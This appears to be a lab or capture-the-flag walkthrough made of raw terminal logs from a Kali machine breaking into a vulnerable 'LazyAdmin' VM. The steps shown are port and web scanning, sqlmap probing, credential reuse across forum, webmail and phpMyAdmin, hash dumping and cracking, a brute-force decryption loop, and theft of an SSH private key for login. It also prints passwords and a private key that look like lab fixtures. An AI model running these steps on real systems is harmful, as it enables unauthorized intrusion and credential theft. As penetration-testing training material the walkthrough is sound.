root@kali:~# netdiscover
Currently scanning: 192.168.67.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:17:86:46 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.101 08:00:27:fe:04:1c 01 060 CADMUS COMPUTER SYSTEMS
root@kali:~# unicornscan -mT 192.168.56.101
TCP open ftp[ 21] from 192.168.56.101 ttl 64
TCP open ssh[ 22] from 192.168.56.101 ttl 64
TCP open http[ 80] from 192.168.56.101 ttl 64
TCP open https[ 443] from 192.168.56.101 ttl 64
TCP open imaps[ 993] from 192.168.56.101 ttl 64
TCP open pop3s[ 995] from 192.168.56.101 ttl 64
root@kali:~# nmap -sS -sV -O 192.168.56.101 -pT:21,22,80,443,993,995
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-07 13:29 CET
Nmap scan report for 192.168.56.101
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.4a
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:FE:04:1C (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# nikto -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2014-01-07 13:35:52 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2014-01-07 13:36:02 (GMT1) (10 seconds)
---------------------------------------------------------------------------
root@kali:~# nikto -ssl -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /CN=webhost
Ciphers: DHE-RSA-AES256-GCM-SHA384
Issuer: /CN=webhost
+ Start Time: 2014-01-08 11:50:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ Cookie phpMyAdmin created without the httponly flag
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2014-01-08 11:52:53 (GMT1) (125 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.101
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Jan 7 13:36:44 2014
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.56.101/forum/
+ http://192.168.56.101/index (CODE:200|SIZE:1782)
+ http://192.168.56.101/index.html (CODE:200|SIZE:1782)
+ http://192.168.56.101/server-status (CODE:403|SIZE:215)
---- Entering directory: http://192.168.56.101/forum/ ----
+ http://192.168.56.101/forum/LICENSE (CODE:200|SIZE:33093)
+ http://192.168.56.101/forum/README (CODE:200|SIZE:730)
==> DIRECTORY: http://192.168.56.101/forum/backup/
==> DIRECTORY: http://192.168.56.101/forum/config/
==> DIRECTORY: http://192.168.56.101/forum/images/
==> DIRECTORY: http://192.168.56.101/forum/includes/
+ http://192.168.56.101/forum/index (CODE:200|SIZE:7348)
+ http://192.168.56.101/forum/index.php (CODE:200|SIZE:7348)
==> DIRECTORY: http://192.168.56.101/forum/install/
==> DIRECTORY: http://192.168.56.101/forum/js/
==> DIRECTORY: http://192.168.56.101/forum/lang/
==> DIRECTORY: http://192.168.56.101/forum/modules/
==> DIRECTORY: http://192.168.56.101/forum/templates_c/
==> DIRECTORY: http://192.168.56.101/forum/themes/
==> DIRECTORY: http://192.168.56.101/forum/update/
---- Entering directory: http://192.168.56.101/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/install/ ----
+ http://192.168.56.101/forum/install/index (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/index.php (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/install (CODE:200|SIZE:12898)
---- Entering directory: http://192.168.56.101/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
DOWNLOADED: 13776 - FOUND: 11
root@kali:/usr/share/dirb# dirb https://192.168.56.101 wordlists/small.txt
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Jan 7 16:54:16 2014
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: wordlists/small.txt
-----------------
GENERATED WORDS: 957
---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: https://192.168.56.101/forum/
+ https://192.168.56.101/index (CODE:200|SIZE:1782)
==> DIRECTORY: https://192.168.56.101/phpmyadmin/
==> DIRECTORY: https://192.168.56.101/webmail/
---- Entering directory: https://192.168.56.101/forum/ ----
+ Dumping session state and Quitting.
-----------------
DOWNLOADED: 1063 - FOUND: 2
http://192.168.56.101/forum/
http://192.168.56.101/forum/config/
sqlmap -u "http://192.168.56.101/forum/index.php" --data="mode=login&username=admin%27&userpw=a"
...
[13:49:41] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
http://192.168.56.101/forum/index.php?mode=user
sqlmap -u "http://192.168.56.101/forum/index.php?mode=user"
...
[13:53:05] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
admin Admin E-mail
MBrown User E-mail
RHedley User E-mail
SWillard Moderator E-mail
Sandy (sw@lazyadmins.corp)
Mark
Richy
sqlmap -u "http://192.168.56.101/forum/index.php?mode=user&show_user=1"
...
[13:56:03] [ERROR] possible integer casting detected (e.g. "$show_user=intval($_REQUEST['show_user'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] y
[13:56:06] [INFO] skipping GET parameter 'show_user'
[13:56:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
http://192.168.56.101/forum/index.php?mode=contact&user_id=2
powered by my little forum
page source:
my little forum 2.3.1
forum:
Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
...
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
by SWillard @, Monday, March 11, 2013, 09:43 (302 days ago)
Hi everybody
As you all know I I got married a few days before (yay :-D)
And because of this I have changed my email-account to match MY NEEEWWW NAME :-D
Bye
Sandy Willard formally known as Sandy Raines ;)
https://192.168.56.101/forum/install/install
CREATE TABLE mlf2_userdata (user_id int(11) NOT NULL auto_increment, user_type tinyint(4) NOT NULL default '0', user_name varchar(255) NOT NULL default '', user_real_name varchar(255) NOT NULL default '', gender tinyint(4) NOT NULL default '0', birthday date NOT NULL default '0000-00-00', user_pw varchar(255) NOT NULL default '', user_email varchar(255) NOT NULL default '', email_contact tinyint(4) default '0', user_hp varchar(255) NOT NULL default '', user_location varchar(255) NOT NULL default '', signature varchar(255) NOT NULL default '', profile text NOT NULL, logins int(11) NOT NULL default '0', last_login timestamp NOT NULL default CURRENT_TIMESTAMP, last_logout timestamp NOT NULL default '0000-00-00 00:00:00', user_ip varchar(128) NOT NULL default '', registered timestamp NOT NULL default '0000-00-00 00:00:00', category_selection varchar(255) DEFAULT NULL, thread_order tinyint(4) NOT NULL default '0', user_view tinyint(4) NOT NULL default '0', sidebar tinyint(4) NOT NULL default '1', fold_threads tinyint(4) NOT NULL default '0', thread_display tinyint(4) NOT NULL default '0', new_posting_notification tinyint(4) default '0', new_user_notification tinyint(4) default '0', user_lock tinyint(4) default '0', auto_login_code varchar(50) NOT NULL default '', pwf_code varchar(50) NOT NULL, activate_code varchar(50) NOT NULL default '', language VARCHAR(255) NOT NULL DEFAULT '', time_zone VARCHAR(255) NOT NULL DEFAULT '', time_difference smallint(4) default '0', theme VARCHAR(255) NOT NULL DEFAULT '', entries_read TEXT NOT NULL, PRIMARY KEY (user_id)) CHAR SET=utf8 COLLATE=utf8_general_ci;
...
INSERT INTO mlf2_userdata VALUES (1, 2, 'admin', '', 0, '0000-00-00',
'c3ccb88dc0a985b9b5da20bb9333854194dfbc7767d91c6936', 'admin@example.com', 1, '', '', '', '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '', NOW(), NULL, 0, 0, 1, 0, 0, 0, 0, 0, '', '', '', '', '', 0, '', '');
http://192.168.56.101/forum/index.php?mode=login
user : mbrown
pass: !DFiuoTkbxtdk0!
http://192.168.56.101/forum/index.php?mode=user&action=edit_profile
E-mail: mb@lazyadmin.corp
Log out
https://192.168.56.101/webmail/src/login.php
username mb@lazyadmin.corp
pass: !DFiuoTkbxtdk0!
https://192.168.56.101/webmail/src/read_body.php?mailbox=INBOX&passed_id=2&startMessage=1
From: sw@lazyadmin.corp
Date: Sun, March 10, 2013 9:23 am
To: mb@lazyadmin.corp
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
Hi,
here are the login-informations for mysql:
Username: root
Password: S4!y.dk)j/_d1pKtX1
Regards,
Sandy
Subject: Audit
From: sw@lazyadmin.corp
Date: Sat, March 16, 2013 8:19 pm
To: mb@lazyadmin.corp
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
Hi Mark,
last we have made a password audit for all of our systems and we have seen
that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use
different passwords for different services. :)
Thank you!
Sandy
https://192.168.56.101/phpmyadmin/
https://192.168.56.101/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1 Documentation
https://192.168.56.101/phpmyadmin/index.php?
user : root
pass: S4!y.dk)j/_d1pKtX1
Exporting rows from "mlf2_userdata" table
"1","2","admin",,"0","0000-00-
00","fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261","webmaster@lazyadmin.corp","1",,,,,"10","2013-03-24 19:03:02","2013-03-24 19:08:31","192.168.8.1","2013-03-09
15:57:17",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"2","0","RHedley","Richard Hedley","1","0000-00-00","31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3","rh@lazyadmin.corp","1",,,,,"5","2013-03-24 19:09:38","2013-03-24 19:09:52","192.168.8.1","2013-03-09 16:22:22",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"3","0","MBrown","Mark Brown","1","0000-00-00","8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1","mb@lazyadmin.corp","1",,,,,"7","2014-01-07 17:02:50","2014-01-07 17:02:50","192.168.56.102","2013-03-09 16:23:28",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"15,4,2,1,3,5,9,10,11,12,13,14,7,6,8"
"4","1","SWillard","Sandy Willard","2","0000-00-00","c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef","sw@lazyadmin.corp","1",,,,,"8","2013-03-24 19:09:08","2013-03-24 19:09:27","192.168.8.1","2013-03-09 16:25:13",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
Exporting rows from "admin" table
"postfix@lazyadmin.corp","d189d0c727a549f263b93176fc851cec","2013-03-0917:34:21","2013-03-24 19:01:06","1"
Exporting rows from "mailbox" table
"rh@lazyadmin.corp","20f1275ce5e67be2c06476333b68f585","Richard Hedley","rh@lazyadmin.corp/","0","rh","lazyadmin.corp","2013-03-09 18:55:10","2013-03-24 19:02:10","1"
"sw@lazyadmin.corp","07255e7701a86ad1672765d15082f1a3","Sandy
Willard","sw@lazyadmin.corp/","0","sw","lazyadmin.corp","2013-03-09 18:56:35","2013-03-24 19:02:23","1"
"mb@lazyadmin.corp","d768176c4486ce77787c73883406fe97","Mark Brown","mb@lazyadmin.corp/","0","mb","lazyadmin.corp","2013
-03-09 18:56:55","2013-03-24 19:01:37","1"
"mp@lazyadmin.corp","fa514a9f39391658b15d5db542029aa6","Miles
Parker","mp@lazyadmin.corp/","0","mp","lazyadmin.corp","2013-03-09 21:14:40","2013-03-24 19:01:57","1"
Exporting rows from "user" table
"localhost","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y
","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"ubuntu","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","
Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"127.0.0.1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y
","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"::1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",
"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"localhost",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N"
,"N","N",,,,,"0","0","0","0",,NULL
"ubuntu",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N
","N",,,,,"0","0","0","0",,NULL
"localhost","debian-sys-maint","*27F84EF9FAA0E841963E4963EFC8D0EC7443A820","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y
","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","N",,,,,"0","0","0","0",,NULL
"localhost","phpmyadmin","*1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98","N","N","N","N","N","N","N","N","N","N","N","N","N",
"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","mail","*0616BA40862AA9B5B194CD196808176F644B2828","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N
","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","forum","*FEAFF5308E872DB9CFBB7585CD62CB7383B53E75","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","
Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,NULL
https://crackstation.net/
20f1275ce5e67be2c06476333b68f585
07255e7701a86ad1672765d15082f1a3
d768176c4486ce77787c73883406fe97
fa514a9f39391658b15d5db542029aa6
20f1275ce5e67be2c06476333b68f585
md5 tum-ti-tum
07255e7701a86ad1672765d15082f1a3
md5 Austin-Willard
d768176c4486ce77787c73883406fe97 Unknown Not Found
fa514a9f39391658b15d5db542029aa6 Unknown Not Found
root@kali:/usr/share/dirb# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password: (tum-ti-tum)
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> pwd
257 "/" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 1 root root 60 May 13 2013 ftp
drwxrwx--- 1 mbrown mbrown 60 Mar 24 2013 mbrown
drwxrwx--- 1 mparker mparker 40 Apr 11 2013 mparker
drwxrwx--- 2 rhedley rhedley 87 Mar 24 2013 rhedley
drwxr-xr-x 2 1000 1000 36 May 12 2013 sraines
drwxrwx--- 5 swillard swillard 128 May 12 2013 swillard
226 Transfer complete
ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx 1 ftp ftpadmin 60 May 13 2013 incoming
226 Transfer complete
ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w- 1 ftp ftpuser 47984 Jan 11 2013 backup_webhost_130111.tar.gz.enc
ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (63067.8 kB/s)
root@kali:~# hd backup_webhost_130111.tar.gz.enc | more
00000000 53 61 6c 74 65 64 5f 5f 6e 39 35 1e fa ac ea b9 |Salted__n95.....|
00000010 13 37 de 82 6f 35 c8 5c ad 90 eb 83 12 eb 05 af |.7..o5.\........|
00000020 4f 7c b2 0d 51 ad f6 41 cd 7f 80 81 78 cf d7 7a |O|..Q..A....x..z|
This is an openssl salted decrypted file
I made an encrypt.sh:
#!/bin/bash
while IFS= read -r LINE; do
echo "$LINE"
openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:$LINE
if [ $? -eq 0 ]
then break
fi
done < /usr/share/wordlists/metasploit-jtr/password.lst
./encrypt.sh
...
abscond
bad decrypt
3074345112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:
absconder
The password is absconder?
root@kali:~# openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:absconder -p
salt=6E39351EFAACEAB9
key=61F734DD3D559913060B3A5F164B853A4D3777688F334E46
iv =677740BB2E10FD0A
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: data
Something is wrong....
root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.102:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 1 root root 60 May 13 2013 ftp
drwxrwx--- 1 mbrown mbrown 60 Mar 24 2013 mbrown
drwxrwx--- 1 mparker mparker 40 Apr 11 2013 mparker
drwxrwx--- 2 rhedley rhedley 87 Mar 24 2013 rhedley
drwxr-xr-x 2 1000 1000 36 May 12 2013 sraines
drwxrwx--- 5 swillard swillard 128 May 12 2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 mbrown mbrown 1675 Mar 10 2013 downloadkey
-rw------- 1 mbrown mbrown 1675 Mar 10 2013 id_rsa
-rw-r--r-- 1 mbrown mbrown 396 Mar 10 2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (5002.3 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (396 bytes)
226 Transfer complete
396 bytes received in 0.00 secs (4345.2 kB/s)
ftp>
root@kali:~# more downloadkey
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp/+cwyFvPJxPw8uRJzcTl+fK6/O6ywThG2ss4pdt6FQH5MMO
eCDadMEvTI1z5tmvjt3CUqueKWt/WIg0+MUZ//zOvCncJ3WZoGsmQ4UEIvDTfWwj
+CqXMTbR5Lz/ywQ3BT/9lZre/LKxVS9WimYIMFsp5Xpl26vbIs9MLzSIpP7u3LlF
cOEZ8Qgom4NeIENdYeSRovSpOuIGTlmY6IveKhQYS9AUrCBf3UFL44qEG0FGDC5C
iUtUgLG1EJE9/y7Q15hfdgcdSntCfSyLtHZKelBe3wfqcGQnnLqOMB8yjl1zgfsF
8/sdAUST3/WJ9AOEi6AJmpe1BE/MoeXteXkcRwIDAQABAoIBAA6zgJ1WxKwyJYzF
uJsM58sIPqqtNnBjqetDUrc1dym4iMRNCWwbu+IxsZjqW/UcoY9H+qRPXlTTkl5F
9RS78s2C6vhuVVSipuHx3nRUJIuGNYupNfCWkYp9+Joiq+OxJ7tu4RsBZXgJjxkc
Pl94FElfAOiS8Gzrug5uw4Tx/O8rN6D6n3IkPiUwQzxhGsRYP+fl9CRV3NhMJAYG
8T8TIJYjocj0dyLXOUJW7+ejUgbIxxtbYQGspafuzvqH/s6ockgQIzQki0Mdhrhg
0aj4KImKhkkOaqs0/hySDSvm/Nwdc/WuhsiIK90uPTwkq2MZbepgKyRRB2kxokQS
qx+pGfECgYEA0q5ZXYl8eFsm/tmgc/jzllqswGmFYXXqUw2f6IB3HUDvfLm0h3vu
WMlxU9gHq8gSn3cUDWjMFAwGn6Ylz1KZlkL/RzhKfrwUlOWj65BC/jQSywVBkvKw
cXUX8mblKiITgL7dK2VdpiIz9ObyT7P9Vbmig0b/Kfz2s7/CfLfVi/8CgYEAzCLY
xGHk6JXn7d5wi4uReUMKGyHdksEhHDCRXlxegs6eQAlHyK1jtJsDP051VaoOj4sJ
fyJ6A61h+GK+OJaQokCR/D2RyxNjP5Ak8l/YWOufTFvojACYpYY3WsARmfBb+pFe
M4S1Gts4sAHmXhrZRrXdUUZUqRraWU8xRP8ND7kCgYEAgxrKM+IN2hvnPWqSZfkD
JIqSvD4uKYMmab6txxLCjSrOnZA23qTposjgxCtIQscDh8ajbODNNqBxMsJC/yxI
tXBFyb0m5o0GRc5N3pZsiiI/m6VOtDJgSIp0d30+mKSR/GlJ2up+h5b7PCjHm3/H
Y6RclFMHEMsBfsQTNGd19WMCgYBSIObzQ6t0A/O22NqQ2gsiLV2gguSBSaBHlia2
PxVrLTOv8cvmqhPGMuOAkdFVMMEA8WBVvQo39obHBvsfCzyPeskBIchJWriAdz7W
IMeLJukFMKkDwq2nUrNsmH+8Xl6zFc8/jPHMJ0zMS0dirwyhjUPIkjI3gu08J0dc
Sfz4SQKBgDpL2Dy1naY2Ji36Bdw8+uNle1CitzXa2pDIvDMWcSl3nvebxM86bcxe
8idZCSpjrr8dLC+dlwok3K/xwrQN1bn3hOLmc0jmMmCFDdUbImfDaAr+6IQU12ka
/F+lTnJDgosnUtgu/eUd+Uh41SVG55oCC404DyZbcIM9rLYkgaDe
-----END RSA PRIVATE KEY-----
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'downloadkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: downloadkey
Permission denied (publickey).
root@kali:~# chmod 600 downloadkey
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$
mbrown@webhost:~$ uname -a
Linux webhost 3.5.0-28-generic #48~precise1-Ubuntu SMP Wed Apr 24 21:43:05 UTC 2013 i686 i686 i386 GNU/Linux
mbrown@webhost:~$ pwd
/home/mbrown
mbrown@webhost:~$ su rhedley
Password:
rhedley@webhost:/home/mbrown$
... some privilege escalation processes...
rhedley@webhost:/home/mbrown$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}
tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt
gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
